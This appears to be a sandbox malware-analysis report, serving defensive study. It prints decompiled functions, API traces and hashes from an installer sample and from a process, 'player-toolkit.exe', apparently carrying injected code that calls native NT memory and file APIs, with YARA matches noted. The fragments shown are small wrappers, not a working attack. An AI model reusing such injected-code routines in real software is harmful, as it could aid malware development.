Uniqueness

Uniqueness Score: -1.00%

Function 00402E3D, Relevance: 6.0, APIs: 4, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402E3D(intOrPtr _a4) {
				long _t2;
				struct HWND__* _t3;
				struct HWND__* _t6;

				if(_a4 == 0) {
					if( *0x429448 == 0) {
						_t2 = GetTickCount();
						if(_t2 >  *0x42f430) {
							_t3 = CreateDialogParamA( *0x42f420, 0x6f, 0, E00402DBA, 0);
							 *0x429448 = _t3;
							return ShowWindow(_t3, 5);
						}
						return _t2;
					} else {
						return E0040653C(0);
					}
				} else {
					_t6 =  *0x429448;
					if(_t6 != 0) {
						_t6 = DestroyWindow(_t6);
					}
					 *0x429448 = 0;
					return _t6;
				}
			}

0x00402e44
0x00402e64
0x00402e6e
0x00402e7a
0x00402e8b
0x00402e94
0x00000000
0x00402e99
0x00402ea0
0x00402e66
0x00402e6d
0x00402e6d
0x00402e46
0x00402e46
0x00402e4d
0x00402e50
0x00402e50
0x00402e56
0x00402e5d
0x00402e5d

APIs

DestroyWindow.USER32(?,00000000,0040301B,00000001), ref: 00402E50
GetTickCount.KERNEL32 ref: 00402E6E
CreateDialogParamA.USER32(0000006F,00000000,00402DBA,00000000), ref: 00402E8B
ShowWindow.USER32(00000000,00000005), ref: 00402E99

Memory Dump Source

Source File: 00000000.00000002.196180196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.196175521.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196186976.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196191567.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196206921.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196210429.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196214797.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196219262.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 8c1e1bd8efa9ab411d4161537fee885c8283498bc89c51da2617a800704498c9
Instruction ID: cc5f9dcce599e9be0c1e5b41ef6f72156ec830c1ee92694e4cf82ced2ffe4824
Opcode Fuzzy Hash: 8c1e1bd8efa9ab411d4161537fee885c8283498bc89c51da2617a800704498c9
Instruction Fuzzy Hash: B6F05E30A45630EBC6317B64FE4CA8B7B64BB44B45B91047AF045B22E8C6740C83CBED

Uniqueness

Uniqueness Score: -1.00%

Function 00405B7D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46
stringCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E00405B7D(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr* _t21;
				void* _t22;

				E004060F7(0x42bc98, _a4);
				_t21 = E00405B28(0x42bc98);
				if(_t21 != 0) {
					E004063D2(_t21);
					if(( *0x42f43c & 0x00000080) == 0) {
						L5:
						_t22 = _t21 - 0x42bc98;
						while(1) {
							_t11 = lstrlenA(0x42bc98);
							_push(0x42bc98);
							if(_t11 <= _t22) {
								break;
							}
							_t12 = E0040646B();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405AD6(0x42bc98);
								continue;
							} else {
								goto L1;
							}
						}
						E00405A8F();
						return 0 | GetFileAttributesA(??) != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}

0x00405b89
0x00405b94
0x00405b98
0x00405b9f
0x00405bab
0x00405bb7
0x00405bb7
0x00405bcf
0x00405bd0
0x00405bd7
0x00405bd8
0x00000000
0x00000000
0x00405bbb
0x00405bc2
0x00405bca
0x00000000
0x00000000
0x00000000
0x00000000
0x00405bc2
0x00405bda
0x00000000
0x00405bee
0x00405bad
0x00405bb1
0x00000000
0x00000000
0x00000000
0x00000000
0x00405bb1
0x00405b9a
0x00000000

APIs

Part of subcall function 004060F7: lstrcpynA.KERNEL32(?,?,00000400,0040341A,Name Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 00406104

Part of subcall function 00405B28: CharNextA.USER32(?,?,0042BC98,?,00405B94,0042BC98,0042BC98,74B5FA90,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B36
Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B3B
Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B4F

lstrlenA.KERNEL32(0042BC98,00000000,0042BC98,0042BC98,74B5FA90,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405BD0
GetFileAttributesA.KERNEL32(0042BC98,0042BC98,0042BC98,0042BC98,0042BC98,0042BC98,00000000,0042BC98,0042BC98,74B5FA90,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,74B5FA90,C:\Users\user\AppData\Local\Temp\), ref: 00405BE0

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405B7D

Memory Dump Source

Source File: 00000000.00000002.196180196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.196175521.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196186976.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196191567.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196206921.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196210429.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196214797.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196219262.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 3248276644-3916508600
Opcode ID: e638d3577084fc0f37fd401aa5ef1a5930802456fef8e272e5ea6ea3ca1dc2da
Instruction ID: a7953992a1868a2a025aeaadbe30fe94b9837340da5d1ec43b16535858986a89
Opcode Fuzzy Hash: e638d3577084fc0f37fd401aa5ef1a5930802456fef8e272e5ea6ea3ca1dc2da
Instruction Fuzzy Hash: 6DF02821105E6116D222323A1C05AAF3A74CE82364715013FF862B22D3CF7CB9139DBE

Uniqueness

Uniqueness Score: -1.00%

Function 00405192, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46
windowCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00405192(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t11;
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					__eflags = _t15 - 0x200;
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						__eflags = _t15 - 0x419;
						if(_t15 == 0x419) {
							__eflags =  *0x42a87c - _t16; // 0x0
							if(__eflags != 0) {
								_push(_t16);
								_push(6);
								 *0x42a87c = _t16;
								E00404B4E();
							}
						}
						L11:
						return CallWindowProcA( *0x42a884, _a4, _t15, _a12, _t16);
					}
					_t11 = IsWindowVisible(_a4);
					__eflags = _t11;
					if(_t11 == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404ACE(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 == 0x20) {
					E004041C7(0x413);
					return 0;
				}
				goto L10;
			}

0x00405196
0x004051a0
0x004051b6
0x004051bc
0x004051de
0x004051e1
0x004051e1
0x004051e7
0x004051e9
0x004051ef
0x004051f1
0x004051f2
0x004051f4
0x004051fa
0x004051fa
0x004051ef
0x00405204
0x00000000
0x00405212
0x004051c1
0x004051c7
0x004051c9
0x00405201
0x00405201
0x00000000
0x00405201
0x004051d5
0x004051d7
0x00000000
0x004051d7
0x004051a6
0x004051ad
0x00000000
0x004051b2
0x00000000

APIs

IsWindowVisible.USER32(?), ref: 004051C1
CallWindowProcA.USER32 ref: 00405212

Part of subcall function 004041C7: SendMessageA.USER32(00050242,00000000,00000000,00000000), ref: 004041D9

Strings

, xrefs: 004051A2

Memory Dump Source

Source File: 00000000.00000002.196180196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.196175521.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196186976.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196191567.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196206921.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196210429.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196214797.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196219262.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 9af3a59599e8879c459ffb9579ce68eec3d4baecce8abe749bc9c6a9b619fe8d
Instruction ID: 7056b910bbb205cd539ea3acc8ab51e06e0639846daa80cdaddfd33d10a348e5
Opcode Fuzzy Hash: 9af3a59599e8879c459ffb9579ce68eec3d4baecce8abe749bc9c6a9b619fe8d
Instruction Fuzzy Hash: 47017171200609ABEF20AF11DD80A5B3666EB84354F14413AFB107A1D1C77A8C62DE6E

Uniqueness

Uniqueness Score: -1.00%

Function 00405FDE, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44
registryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00405FDE(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x400;
				_t21 = E00405F7D(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExA(_a20, _a12, 0,  &_a8, _t30,  &_v8);
					_t21 = RegCloseKey(_a20);
					_t30[0x3ff] = _t30[0x3ff] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}

0x00405fec
0x00405fee
0x00406006
0x0040600b
0x00406010
0x0040604d
0x0040604d
0x00406012
0x00406024
0x0040602f
0x00406035
0x0040603f
0x00000000
0x00000000
0x0040603f
0x00406052

APIs

RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,00000400,: Completed,?,?,?,?,00000002,: Completed,?,00406293,80000002), ref: 00406024
RegCloseKey.ADVAPI32(?,?,00406293,80000002,Software\Microsoft\Windows\CurrentVersion,: Completed,: Completed,: Completed,?,Completed), ref: 0040602F

Strings

: Completed, xrefs: 00405FE1, 00406015

Memory Dump Source

Source File: 00000000.00000002.196180196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.196175521.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196186976.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196191567.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196206921.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196210429.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196214797.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196219262.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseQueryValue
String ID: : Completed
API String ID: 3356406503-2954849223
Opcode ID: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
Instruction ID: 43fb42cdfa68b2f9ef01d23c83e90927a4e1ed7766022ad00d18a88e1c3f91d6
Opcode Fuzzy Hash: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
Instruction Fuzzy Hash: 9F01BC72100209ABCF22CF20CC09FDB3FA9EF45364F00403AF916A2191D238C968CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00403875, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403875() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x429854;
				_t3 = E0040385A(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						FreeLibrary( *(_t6 + 8));
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x429854 =  *0x429854 & 0x00000000;
				return _t3;
			}

0x00403876
0x0040387e
0x00403885
0x00403888
0x00403888
0x0040388a
0x0040388f
0x00403896
0x0040389c
0x004038a0
0x004038a1
0x004038a9

APIs

FreeLibrary.KERNEL32(?,74B5FA90,00000000,C:\Users\user\AppData\Local\Temp\,0040384D,00403667,?,?,00000007,00000009,0000000B), ref: 0040388F
GlobalFree.KERNEL32 ref: 00403896

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403875

Memory Dump Source

Source File: 00000000.00000002.196180196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.196175521.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196186976.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196191567.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196206921.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196210429.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196214797.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196219262.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-3916508600
Opcode ID: 7191d99a6f9acf46369f1b571abb68d71f554d24c115b495d4645827db6beddd
Instruction ID: eaa0fdc8f68cdeff62b7926931e70464fa678e679eb7ff43971a821d65c68845
Opcode Fuzzy Hash: 7191d99a6f9acf46369f1b571abb68d71f554d24c115b495d4645827db6beddd
Instruction Fuzzy Hash: 20E08C335110205BC7613F54EA0471A77ECAF59B62F4A017EF8847B26087781C464A88

Uniqueness

Uniqueness Score: -1.00%

Function 00405AD6, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405AD6(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}

0x00405ad7
0x00405ae1
0x00405ae3
0x00405aea
0x00405af2
0x00000000
0x00000000
0x00000000
0x00405af2
0x00405af4
0x00405af9

APIs

lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402F0D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\focus.exe,C:\Users\user\Desktop\focus.exe,80000000,00000003), ref: 00405ADC
CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F0D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\focus.exe,C:\Users\user\Desktop\focus.exe,80000000,00000003), ref: 00405AEA

Strings

C:\Users\user\Desktop, xrefs: 00405AD6

Memory Dump Source

Source File: 00000000.00000002.196180196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.196175521.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196186976.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196191567.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196206921.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196210429.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196214797.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196219262.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-1669384263
Opcode ID: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
Instruction ID: fbea36dfa466fa1ea2516b65251d52c814037185d06ce8b70eff5ee1363e4df1
Opcode Fuzzy Hash: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
Instruction Fuzzy Hash: 73D0A7B25089706EFB0352509C00B8F6E88CF17300F0A04A3E080A7191C7B84C424BFD

Uniqueness

Uniqueness Score: -1.00%

Function 00405BF5, Relevance: 5.0, APIs: 4, Instructions: 37
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405BF5(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}

0x00405c05
0x00405c07
0x00405c0a
0x00405c36
0x00405c0f
0x00405c18
0x00405c1d
0x00405c28
0x00405c2b
0x00405c47
0x00405c2d
0x00405c34
0x00000000
0x00405c34
0x00405c40
0x00405c44
0x00405c44
0x00405c3e
0x00000000

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C05
lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C1D
CharNextA.USER32(00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C2E
lstrlenA.KERNEL32(00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C37

Memory Dump Source

Source File: 00000000.00000002.196180196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.196175521.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196186976.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196191567.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196206921.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196210429.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196214797.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196219262.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: b2794e6bf21c90d62e2ecb38362cfad12420dfe545fda3f665c5114a80d4c16b
Instruction ID: 0c44f0240925c5b75b39479a83fd13515cb2c3d3321eb5bdfbc953cb3faf5d46
Opcode Fuzzy Hash: b2794e6bf21c90d62e2ecb38362cfad12420dfe545fda3f665c5114a80d4c16b
Instruction Fuzzy Hash: FBF0F631105A18FFDB12DFA4CD00D9EBBA8EF55350B2540B9E840F7210D634DE01AFA8

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: player-toolkit.exe PID: 2588 Parent PID: 3176 player-toolkit.exeCOMMON

Executed Functions

Function 00029F2D, Relevance: 1.6, APIs: 1, Instructions: 50
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00029F2D(void* __eax, void* __edx, void* __eflags, void* _a4, void* _a8, void* _a12, void* _a16, void* _a20, void* _a24, void* _a28) {
				void* _v0;

				if (__eflags < 0) goto L3;
			}

0x00029f2f

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0002AB24,?,00000000,?,00003000,00000040,00000000,00000000,00019CC3), ref: 00029F69

Memory Dump Source

Source File: 00000002.00000002.357992240.0000000000011000.00000040.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 00000002.00000002.357982830.0000000000010000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 367a885abf7eb7aa56ad5d7555d54a88bbf671584170928ed2bb33d81a26fbc1
Instruction ID: f17cea12f5c17a941a22b45dbadb0e570ffa6f077fcc29422c5b207313dae821
Opcode Fuzzy Hash: 367a885abf7eb7aa56ad5d7555d54a88bbf671584170928ed2bb33d81a26fbc1
Instruction Fuzzy Hash: 62011AB1600219AFCB04DF89DC81EEB73ADEF88310F118519BD1897242D630E811CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 00029D50, Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00029D50(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E0002A950(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}

0x00029d5f
0x00029d67
0x00029d9d
0x00029da1

APIs

NtCreateFile.NTDLL(00000060,00019CC3,?,00024B77,00019CC3,FFFFFFFF,?,?,FFFFFFFF,00019CC3,00024B77,?,00019CC3,00000060,00000000,00000000), ref: 00029D9D

Memory Dump Source

Source File: 00000002.00000002.357992240.0000000000011000.00000040.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 00000002.00000002.357982830.0000000000010000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: c5ea72943b871a0c2d9a6127a400c3c64b023e9d9c4ce3fc2c56bdc2bc171312
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: 2BF0B2B2200208AFCB08CF89DC95EEB77ADAF8C754F158248BA1D97241C630E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00029E00, Relevance: 1.5, APIs: 1, Instructions: 36
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00029E00(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E0002A950(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t18 =  *((intOrPtr*)( *_t28))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40); // executed
				return _t18;
			}

0x00029e03
0x00029e0f
0x00029e17
0x00029e45
0x00029e49

APIs

NtReadFile.NTDLL(00024D32,5EB6522D,FFFFFFFF,000249F1,?,?,00024D32,?,000249F1,FFFFFFFF,5EB6522D,00024D32,?,00000000), ref: 00029E45

Memory Dump Source

Source File: 00000002.00000002.357992240.0000000000011000.00000040.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 00000002.00000002.357982830.0000000000010000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: bbe17b0ddb2a416ad66008eebd248b5154d7f915dd88f91a9f49114307510035
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: F5F0B7B2200208AFCB14DF89DC91EEB77ADEF8C754F158248BE1D97241DA30E851CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00029F30, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0002AB24,?,00000000,?,00003000,00000040,00000000,00000000,00019CC3), ref: 00029F69

Memory Dump Source

Source File: 00000002.00000002.357992240.0000000000011000.00000040.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 00000002.00000002.357982830.0000000000010000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: 8290bc2c88f7e82b2b77ce1145ee4a36faf3c8f13654b5ffbef291b69a7006c7
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: 09F015B2200218AFCB14DF89DC81EEB77ADAF88750F118148BE1897241C630F810CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00029E7C, Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00029E7C(void* __eax, intOrPtr _a4, void* _a8) {
				long _t11;
				void* _t15;

				_t8 = _a4;
				_t4 = _t8 + 0x10; // 0x300
				_t5 = _t8 + 0xc50; // 0x1a913
				E0002A950(_t15, _a4, _t5,  *_t4, 0, 0x2c);
				_t11 = NtClose(_a8); // executed
				return _t11;
			}

0x00029e83
0x00029e86
0x00029e8f
0x00029e97
0x00029ea5
0x00029ea9

APIs

NtClose.NTDLL(00024D10,?,?,00024D10,00019CC3,FFFFFFFF), ref: 00029EA5

Memory Dump Source

Source File: 00000002.00000002.357992240.0000000000011000.00000040.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 00000002.00000002.357982830.0000000000010000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 3f9775770ddc7639123bde2ae18ce2dcabe2f98a4e4f4ca7c26f2957fd12380c
Instruction ID: 3d4b06f8c2c807a8eea10f8c6e18a3fa18f4d5870e1d3c17239d7baaac2782c0
Opcode Fuzzy Hash: 3f9775770ddc7639123bde2ae18ce2dcabe2f98a4e4f4ca7c26f2957fd12380c
Instruction Fuzzy Hash: 77E0C275200210BFD710DB94DC45FDB3B58EF44350F054049B91C9B242C530E500C790

Uniqueness

Uniqueness Score: -1.00%

Function 00029E80, Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00029E80(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x1a913
				E0002A950(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}

0x00029e83
0x00029e86
0x00029e8f
0x00029e97
0x00029ea5
0x00029ea9

APIs

NtClose.NTDLL(00024D10,?,?,00024D10,00019CC3,FFFFFFFF), ref: 00029EA5

Memory Dump Source

Source File: 00000002.00000002.357992240.0000000000011000.00000040.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 00000002.00000002.357982830.0000000000010000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: 426300200a7cfde8d21277b6a1ba5257b4d2e4346498e29a1675435f1b8ab3ad
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: CAD01776600214ABD710EB99DC86FE77BACEF48760F154499BA5C9B242C930FA0086E0

Uniqueness

Uniqueness Score: -1.00%

Function 02999A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02999A0A

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 558d83bf75e61dcc75c24f2f4159a40bb7405458c7a358324c73f337040c044f
Instruction ID: 3a87a82811a4c4bd17cbaa4a83495c268ddf1c4a57f54dfb5bd2c2f326c38601
Opcode Fuzzy Hash: 558d83bf75e61dcc75c24f2f4159a40bb7405458c7a358324c73f337040c044f
Instruction Fuzzy Hash: 9690027120160412D1006159482470B005597D0346F91C011A1154595D8A65885175F1

Uniqueness

Uniqueness Score: -1.00%

Function 02999A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02999A2A

Memory Dump Source

